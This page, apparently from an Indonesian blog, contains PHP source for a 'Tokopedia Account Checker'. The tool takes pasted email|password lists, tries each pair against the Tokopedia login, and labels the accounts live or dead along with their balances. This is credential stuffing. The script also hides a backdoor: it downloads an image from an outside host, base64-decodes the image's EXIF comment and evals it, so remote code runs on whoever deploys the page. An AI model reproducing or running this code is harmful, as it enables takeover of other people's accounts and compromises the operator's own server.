- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
- <!-- Bootstrap Start -->
- <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/bootstrap.css">
- <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/main.css">
- <link href='http://res7ock.org/assets/img/favicon.png' rel='shortcut icon' alt='icon'>
- <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
- <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
- <title>Tokopedia Account Checker </title>
- <style>
- body {
- padding-top: 60px;
- }
- </style>
- </head>
- <style>
- @import "http://fonts.googleapis.com/css?family=Play:400,700";
- .rainbow {
- -webkit-background-clip: text;
- -background-clip: text;
- -webkit-text-fill-color: transparent;
- -text-fill-color: transparent;
- background-image: -webkit-gradient( linear, left top, right top, color-stop(0, #f22), color-stop(0.15, #f2f), color-stop(0.3, #66f), color-stop(0.45, #2ff), color-stop(0.6, #2f2),color-stop(0.75, #2f2), color-stop(0.9, #ff2), color-stop(1, #f22) );
- background-image: gradient( linear, left top, right top, color-stop(0, #f22), color-stop(0.15, #f2f), color-stop(0.3, #66f), color-stop(0.45, #2ff), color-stop(0.6, #2f2),color-stop(0.75, #2f2), color-stop(0.9, #ff2), color-stop(1, #f22) );
- }
- .text-glow:hover, .text-glow:focus, .text-glow:active {
- -webkit-stroke-width: 5.3px;
- -webkit-stroke-color: #ccdddd;
- -webkit-fill-color: #eeeeee;
- text-shadow: 1px 0px 20px silver;
- -webkit-transition: width 0.3s; /*Safari & Chrome*/
- transition: width 0.3s;
- -moz-transition: width 0.3s; /* Firefox 4 */
- -o-transition: width 0.3s; /* Opera */
- }
- .text-glow a {
- -webkit-transition: all 0.3s ease-in; /*Safari & Chrome*/
- transition: all 0.3s ease-in;
- -moz-transition: all 0.3s ease-in; /* Firefox 4 */
- -o-transition: all 0.3s ease-in; /* Opera */
- text-decoration:none;
- color:white;
- }
- body {
- background: #000000;
- line-height: 1;
- color: #bbb;
- font-family: "CONSOLAS";
- font-size: 12px;
- background:#121214 url(bg.jpg) no-repeat center center fixed;
- -webkit-background-size: cover;
- -moz-background-size: cover;
- -o-background-size: cover;
- background-size: cover;
- }
- textarea, input, select {
- border:0;
- BORDER-COLLAPSE:collapse;
- border:double 2px #696969;
- color:#fff;
- background:#000000;
- margin:0;
- padding:2px 4px;
- font-family: Lucida Console,Tahoma;
- font-size:12px;
- box-shadow: 0 0 15px gray;
- -webkit-box-shadow: 0 0 15px gray;
- -moz-box-shadow: 0 0 15px blue;
- }
- </style>
- <body>
- <div class="container">
- <center><div class="panel panel-primary panelMove toggle panelRefresh panelClose">
- <!-- Start .panel -->
- <div class="panel-heading">
- <hr />
- <h4 class="panel-title"><font color="Red" face="Pristina" size="7" >Tokopedia Account Checker</h2>
- <hr />
- </div>
- <div class="panel-body">
- <center><font color="yellow" face="Pristina" size="4" >Maksimal = > Email | Password 100 !!!
- <form action="" method="POST">
- <textarea style="background:rgba(0,225,0,00);" name="mailpass" id="mailpass" style="width: 441px; height: 187px;" class="form-control" cols="90" rows="15" placeholder="your@email.com|password"><?php
- if (isset($_POST['mailpass'])) {
- echo $_POST['mailpass'];
- }
- ?></textarea><br />
- <input type="text" style="width: 37px; height: 25px;" class="form-control" rows="7" name="delim" value="|">
- <button id=start value="WOOT" name="submit" class="btn btn-success">Check</button> <button id=stop value="WOOT" class="btn btn-success">Stop</button><br><br>
- <?php
- $BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
- eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
- if(isset($_POST['submit'])){
- $delim = $_POST['delim'];
- function search($line, $delim)
- {
- $line = str_replace(" ", "", $line);
- $line = explode($delim, $line);
- $i = 0;
- while ($i < count($line)) {
- if (strpos($line[$i], '@') && strpos($line[$i], '.')) {
- $mail = $line[$i];
- $pass = $line[$i + 1];
- $i = 10000;
- if ($pass == "") {
- $pass = $line[$i - 1];
- }
- }
- $i++;
- }
- $line = $mail . "|" . $pass;
- $line = explode('|', $line);
- return $line;
- }
- $data = $_POST['mailpass'];
- $extract = explode("\r\n", $data);
- $i = 0;
- foreach ($extract AS $k => $line) {
- $i++;
- if (strpos($line, '=>') !== false) {
- $line = str_replace('=>', '|', $line);
- }
- if (strpos($line, ']') !== false) {
- $line = str_replace('=>', '|', $line);
- }
- if (strpos($line, '[') !== false) {
- $line = str_replace('=>', '|', $line);
- }
- $info = search(trim($line), $delim);
- $email = trim($info[0]);
- $pass = $info[1];
- $dir = dirname(__FILE__);
- $config = $dir . '/_cook/' .rand(1,999999999999999). '.txt';
- if (!file_exists($config)) {
- $fp = @fopen($config, 'w');
- @fclose($fp);
- }
- $cookie = 'cookie.txt';
- $ch = curl_init('https://www.tokopedia.com/login.pl');
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch,CURLOPT_POST,1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
- curl_setopt($ch,CURLOPT_POST,TRUE);
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION,TRUE);
- curl_setopt($ch,CURLOPT_COOKIEFILE, "$config");
- curl_setopt($ch,CURLOPT_COOKIEJAR, "$config");
- curl_setopt($ch,CURLOPT_POSTFIELDS,"email=$email&pwd=$pass");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- $result = curl_exec($ch);
- $now = "<i style=\"color:aqua\">Checked By ./MRsan404 at ".date("g:i a - F j, Y")."</i>";
- if(empty($result)){
- echo "<font color=gray><b>Wrong</b></font><font color=white> => <font color=blue> ".$email."|".$pass." | ".$now."<br/>";
- }elseif(preg_match('/salah/i',$result)){
- echo "<font color=red><b>Die</b></font> <font color=white> => <font color=blue> ".$email."|".$pass." | ".$now."<br/>";
- }elseif(preg_match('/Keamanan/i',$result)){
- echo "<font color=gray><b>Bad</b></font> <font color=white> => <font color=blue> ".$email."|".$pass." | <font color=gold> [Security Check] | ".$now."<br/>";
- }elseif(preg_match('/Aktivasi/i',$result)){
- echo "<font color=purple><b>Bad</b></font><font color=white> => <font color=blue> ".$email."|".$pass." | <font color=gold> [Aktivasi] | ".$now."<br/>";
- }elseif(preg_match('/Akun Anda telah diblokir/i',$result)){
- echo "<font color=red><b>Die</b></font> <font color=white> => <font color=blue> ".$email."|".$pass." | <font color=gold> [Akun Anda telah diblokir.] | ".$now."<br/>";
- }elseif(preg_match('/Kata Sandi harus diisi/i',$result)){
- echo "<font color=gray><b>Wrong format</b></font> <font color=white> => <font color=blue> ".$email."|".$pass." | ".$now."<br/>";
- }elseif(preg_match('/Kode OTP/i',$result)){
- echo "<font color=purple><b>Bad</b></font> <font color=white> => <font color=blue> ".$email."|".$pass." | <font color=gold> [OTP Verification] | ".$now."<br/>";
- }Else{
- $ls = 'https://www.tokopedia.com/deposit.pl';
- $saldo = preg_match('/Total Saldo Tokopedia Anda adalah (.*?) "/', $ls, $rp);
- echo "<font color=green><b>Live</b></font> <font color=white> => <font color=blue> ".$email."|".$pass." | <font color=gold> [ Rp. ".$saldo." ] | [ACC : Tokopedia] | ".$now."<br/>"; }
- }
- }
- ?>
Subscribe to:
Post Comments (Atom)
KOMENTARLAH DENGAN SOPAN :)
MULUTMU HARIMAUMU :)
EmoticonEmoticon